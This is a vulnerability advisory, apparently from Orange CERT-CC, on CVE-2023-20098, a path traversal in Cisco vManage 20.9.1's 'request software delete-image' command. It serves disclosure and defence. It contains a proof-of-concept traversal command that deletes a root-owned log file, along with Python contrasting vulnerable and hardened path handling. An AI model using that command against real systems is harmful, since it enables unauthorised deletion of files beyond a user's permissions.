Overview
Loss of vManage firmware image availability
Details
On vManage 20.9.1, CLI users with access to the “request software delete-image” command can delete files outside the /images directory.
Below is a demonstration of deleting a log file that the same user has no rights to delete directly from the shell.
This command does not exist in 20.6.4, so current production versions are not affected.
Proof of Concept
Following commands executed as standard user (not root):
BGE-VDR-vMM-2:/var/log$ ls -l vsyslog*
-rw-r--r-- 1 root adm 4204176 Oct 27 08:56 vsyslog
-rw-r--r-- 1 root adm 10485911 Oct 25 21:53 vsyslog.1
-rw-r--r-- 1 root root 10485838 Sep 8 11:45 vsyslog.10
-rw-r--r-- 1 root adm 10485942 Oct 22 05:36 vsyslog.2
-rw-r--r-- 1 root adm 10485834 Oct 18 13:24 vsyslog.3
-rw-r--r-- 1 root adm 10486296 Oct 14 21:24 vsyslog.4
-rw-r--r-- 1 root adm 10488153 Oct 11 05:24 vsyslog.5
-rw-r--r-- 1 root adm 10486362 Oct 7 13:16 vsyslog.6
-rw-r--r-- 1 root adm 10485894 Oct 3 23:26 vsyslog.7
-rw-r--r-- 1 root adm 10485851 Sep 30 07:25 vsyslog.8
-rw-r--r-- 1 root adm 10485910 Sep 26 15:38 vsyslog.9
BGE-VDR-vMM-2:/var/log$ rm vsyslog.10
rm: remove write-protected regular file 'vsyslog.10'? y
rm: cannot remove 'vsyslog.10': Permission denied
BGE-VDR-vMM-2:/var/log$ exit
exit
BGE-VDR-vMM-2# request software delete-image ../var/log/vsyslog.10
status Deleted /images/../var/log/vsyslog.10
BGE-VDR-vMM-2# vs
BGE-VDR-vMM-2:~$ ls -l /var/log/vsyslog.*
-rw-r--r-- 1 root adm 10485911 Oct 25 21:53 /var/log/vsyslog.1
-rw-r--r-- 1 root adm 10485942 Oct 22 05:36 /var/log/vsyslog.2
-rw-r--r-- 1 root adm 10485834 Oct 18 13:24 /var/log/vsyslog.3
-rw-r--r-- 1 root adm 10486296 Oct 14 21:24 /var/log/vsyslog.4
-rw-r--r-- 1 root adm 10488153 Oct 11 05:24 /var/log/vsyslog.5
-rw-r--r-- 1 root adm 10486362 Oct 7 13:16 /var/log/vsyslog.6
-rw-r--r-- 1 root adm 10485894 Oct 3 23:26 /var/log/vsyslog.7
-rw-r--r-- 1 root adm 10485851 Sep 30 07:25 /var/log/vsyslog.8
-rw-r--r-- 1 root adm 10485910 Sep 26 15:38 /var/log/vsyslog.9
BGE-VDR-vMM-2:~$ exit
exit
BGE-VDR-vMM-2# show ver
20.9.1
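The status line above shows the deleted path being formed by joining /images with the user-supplied name and acting on it without canonicalizing the result, which is why "../var/log/vsyslog.10" escapes the directory. The following Python is an added illustration written for this advisory, not Cisco's code: `naive_image_path` mirrors the observed behaviour, and `safe_image_path` shows the containment check a hardened implementation would apply before unlinking anything. The base directory, helper names and the constructed sample filename are assumptions.

```python
import os
from typing import Optional

# Directory the command is meant to be confined to (per the advisory's status line).
IMAGES_DIR = "/images"


def naive_image_path(name: str) -> str:
    """Mirror the behaviour seen in the advisory: plain join, no canonicalization.

    A name of "../var/log/vsyslog.10" becomes "/images/../var/log/vsyslog.10",
    which the filesystem happily resolves to /var/log/vsyslog.10.
    """
    return os.path.join(IMAGES_DIR, name)


def safe_image_path(name: str, base: str = IMAGES_DIR) -> Optional[str]:
    """Return the canonical path if it stays inside base, otherwise None.

    The caller must only unlink the returned path; a None result should be
    rejected and logged as an attempted escape from the image directory.
    """
    # Absolute names are rejected outright: os.path.join would discard base.
    if os.path.isabs(name):
        return None
    base_real = os.path.realpath(base)
    # realpath collapses ".." components and follows symlinks, so the check
    # below sees where the name really points, not how it was spelled.
    candidate = os.path.realpath(os.path.join(base_real, name))
    # Containment: the common prefix must be base itself; this also defeats
    # sibling directories such as "/images2" sharing a string prefix.
    if os.path.commonpath([base_real, candidate]) != base_real:
        return None
    # Refuse to operate on the directory itself (e.g. name "." or "").
    if candidate == base_real:
        return None
    return candidate


if __name__ == "__main__":
    # Constructed sample names for demonstration only.
    for n in ("example-image.tar.gz", "../var/log/vsyslog.10", "/var/log/vsyslog.10"):
        print(f"{n!r:32} naive={naive_image_path(n)!r:40} safe={safe_image_path(n)!r}")
```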
Solution
Security patch
Upgrade to the patched Cisco IOS release, as described in the Cisco Security Advisory.
References
https://nvd.nist.gov/vuln/detail/CVE-2023-20098
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iox-priv-escalate-Xg8zkyPk
Credits
Orange CERT-CC
Frederic MEZOU at Orange Business
Timeline
Date reported: October 28, 2022
Date fixed: April 19, 2023